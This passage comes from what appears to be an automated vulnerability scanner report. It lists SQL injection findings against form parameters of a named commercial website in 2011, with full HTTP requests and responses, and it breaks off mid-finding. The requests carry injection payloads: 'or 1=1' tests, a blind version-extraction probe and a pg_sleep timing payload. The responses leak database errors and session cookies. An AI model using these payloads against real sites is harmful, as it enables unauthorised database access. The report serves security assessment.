   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.173. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_394 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_394 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_394 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure'&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n3t171g9gb6l1c06u4t80raku6; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '24-hour&attributeId_397=1957__Less than $2,500&attributeId_508[]=3311__ Credit c' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure''&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 02:08:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bcva6f0asll7rrbu3ov0gqndt4; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00/project.php was not found on this server.</p>

1.174. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_395 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_395 parameter appears to be vulnerable to SQL injection attacks. The payloads 49261789'%20or%201%3d1--%20 and 49261789'%20or%201%3d2--%20 were each submitted in the attributeId_395 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP49261789'%20or%201%3d1--%20&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP49261789'%20or%201%3d2--%20&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Inbound Call Center Service, Use InsideUp to Get Quotes and Compare Call Center Vendors. </title>
   <meta name="description" content="Let inbound call centers providers compete for your telemarketing needs. Compare call center services from leading inbound call center vendors."/>
   <meta name="keywords" content=" nbound call center solution, call center inbound service, inbound call center solutions, call center inbound, inbound call center, inbound call centers "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 10    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9, #step_10, #step_11,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Blo
...[SNIP]...

1.175. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_395 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_395 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_395 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP'&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c3obdd1mi91f9borvl4pao9eb1; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '24-hour&attributeId_397=1957__Less than $2,500&attributeId_508[]=3311__ Credit c' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP''&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=m0o8prfjppbhu5roatvqpfug56; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.176. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_396 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_396 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_396 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour'&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=mcvauiobunbnif5cpr0cqo2j35; path=/
Content-Length: 6942
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'than $2,500&attributeId_508[]=3311__ Credit card processing&button3=Submit&compa' at line 5

Request 2

GET /ppc/leadflow/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour''&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:09:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1p27h2q2cmb4mc421lunvfclr4; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.177. http://www.insideup.com/ppc/leadflow/cace00/project.php [attributeId_396 parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.insideup.com
Path:   /ppc/leadflow/cace00/project.php

Issue detail

The attributeId_396 parameter appears to be vulnerable to SQL injection attacks. The payloads 14010757'%20or%201%3d1--%20 and 14010757'%20or%201%3d2--%20 were each submitted in the attributeId_396 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour14010757'%20or%201%3d1--%20&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=%27))%3BSELECT%20pg_sleep(25)--&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i38dgdf99msiunl575doegghj0; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 03:42:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...
<title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title>
   <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/>
   <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/>
   <link rel="stylesheet" href="css/newlanding_style.css" />
   <link rel="stylesheet" href="style/dhtmlwindow.css" />
   <link rel="stylesheet" href="css/ui.core.css" />
   <link rel="stylesheet" href="css/Dyn_form_style.css" />
   <script type="text/javascript" src='js/jquery.js'></script>
   <script type="text/javascript" src="js/ui.core.js"></script>
   <script type="text/javascript">
   jQuery(document).ready(function() {
               jQuery("form").attr("autocomplete", "off");    
   });
       var global_form_attribute = 8    </script>
   
   <script language="javascript" src="js/dhtmlwindow.js"></script>
   <script language="javascript" src="js/modal.js"></script>
   <script type="text/javascript" src="js/application_js.js"></script>
   <link href="css/styles.css" rel="stylesheet" type="text/css" />
   <script>
       function frmprompt(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0')
       }
       function frmprompt02(){
           frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv02', 'Why do we need this information?', 'width=399px,height=90px,left=150px,top=200px,center=1,resize=0,scrolling=0')
       }
   </script>
   <style>
   #step_1, #step_2, #step_3, #step_4, #step_5, #step_6, #step_7, #step_8, #step_9,    {
       font-size:12px;
       width:100%;
   }
   .blackback {
       background-color:#cccccc;
   }
   .whiteback {
       background-color:#ffffff;
   }
   </style>
</head>
<body>
<div id="Main_div_wrap">
   <div id="Main_Contant_Block">
       <div id="lending_headern">
       <table width="900" border="0" cellspacing="0" cellpadding="0">
       <tr
...[SNIP]...

Request 2

